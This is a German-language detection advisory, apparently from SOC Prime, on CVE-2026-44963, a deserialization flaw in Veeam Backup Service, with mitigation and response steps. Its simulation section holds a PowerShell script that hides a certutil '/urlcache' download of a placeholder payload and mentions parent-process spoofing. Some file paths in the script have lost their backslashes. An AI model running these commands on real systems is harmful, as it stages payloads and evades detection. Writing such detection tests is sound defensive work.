SOC Prime Bias: Kritisch

10 Jul 2026 18:16 UTC

CVE-2026-44963: Anzeichen für die Ausnutzung des Veeam Backup-Dienstes

Author Photo
SOC Prime Team linkedin icon Folgen
CVE-2026-44963: Anzeichen für die Ausnutzung des Veeam Backup-Dienstes
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Dieser Bericht beschreibt Indikatoren für Kompromittierungen im Zusammenhang mit CVE-2026-44963, einer Sicherheitslücke im Veeam Backup Service, die Remote-Code-Ausführung durch unsichere Deserialisierung ermöglicht. Angreifer könnten diese Schwachstelle ausnutzen, um verdächtige Kindprozesse vom Veeam-Dienst aus zu starten. Die daraus resultierende Aktivität kann zu unbefugtem Zugriff führen und Möglichkeiten für seitliche Bewegungen im Netzwerk schaffen.

Untersuchung

Die Untersuchung konzentriert sich auf die Erkennung verdächtiger Kindprozesse, die durch Veeam.Backup.Service.exegestartet werden, einschließlich Tools wie cmd.exe or powershell.exe, und auf die Identifizierung ungewöhnlicher Netzwerkaktivitäten auf Veeam-bezogenen Ports. Analysten sollten auch auf unbefugte Anmeldeereignisse und unerwartete Dateiveränderungen in Veeam-Verzeichnissen achten.

Abschwächung

Um das Risiko zu verringern, sollten Administratoren Veeam Backup & Replication auf eine Version aktualisieren, die die unsichere Deserialisierungs-Schwachstelle behebt. Firewall-Richtlinien sollten den Zugriff auf Veeam-Ports strikt beschränken 9392-9419, und Verteidiger sollten die Authentifizierung zu diesen Diensten durch nicht-administrative Domänenbenutzer überwachen. Dienstkonten sollten ebenfalls gemäß den Prinzipien der minimalen Rechtevergabe eingeschränkt werden.

Reaktion

Wird verdächtige Aktivität festgestellt, sollte der betroffene Veeam-Server sofort vom Netz isoliert werden. Ermittler sollten die Prozessexekutionsprotokolle überprüfen, einschließlich Ereignis-ID 4688 und Sysmon-Telemetrie, zusammen mit Netzwerkverbindungsaufzeichnungen, um das Ausmaß der Kompromittierung festzustellen. Die letzte Kontenaktivität sollte geprüft und die Anmeldedaten für alle während des vermuteten Einbruchsfensters beteiligten Konten zurückgesetzt werden.

Angriffsablauf

Simulationsdurchführung

Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und die erwartete Telemetrie erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Angreifer zielt auf eine Sicherheitslücke im Veeam Backup Service (simuliert), um Ausführungsrechte zu erlangen. Um unauffällig zu bleiben, während er eine Payload der zweiten Phase herunterlädt, verwendet der Angreifer den gekaperten Veeam-Prozess, um certutil.exe, ein gängiges Living-off-the-Land-Binary, zu starten, um eine Remote-Datei abzurufen. Diese Aktion soll die prozess_erstellung Logik der Erkennungsregel auslösen.

  • Regressionstest-Skript:

    # SIMULATION START: Dieses Skript simuliert, dass der Veeam-Dienst einen verdächtigen Prozess startet.
    # Hinweis: Da wir nicht einfach der Veeam-Dienst mit Admin/System-Rechten werden können,
    # simulieren wir die Telemetrie, indem wir einen Dummy-Prozess erstellen, der den ParentImage-Pfad imitiert.
    
    $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe"
    $TargetBinary = "certutil.exe"
    
    Write-Host "[+] Simulieren eines verdächtigen Kindprozesses von $VeeamPath" -ForegroundColor Cyan
    
    # In einer echten Umgebung würde die Schwachstelle den Dienst dazu veranlassen, dies aufzurufen.
    # Zur Validierung lösen wir den Prozess aus. Um die Sigma-Regel's 
    # 'ParentImage'-Anforderung im Labor strikt zu erfüllen, sollte der Tester einen Prozess manuell umbenennen
    # oder ein Werkzeug verwenden, um die Parent Process ID (PPID) zu fälschen, wenn ein spezifisches EDR getestet wird.
    
    Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden
    
    Write-Host "[+] Simulationsbefehl ausgeführt." -ForegroundColor Green
  • Bereinigungsbefehle:

    # Entfernen Sie alle temporären Dateien, die durch die Simulation erstellt wurden
    Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue
    Stop-Process -Name "certutil" -ErrorAction SilentlyContinue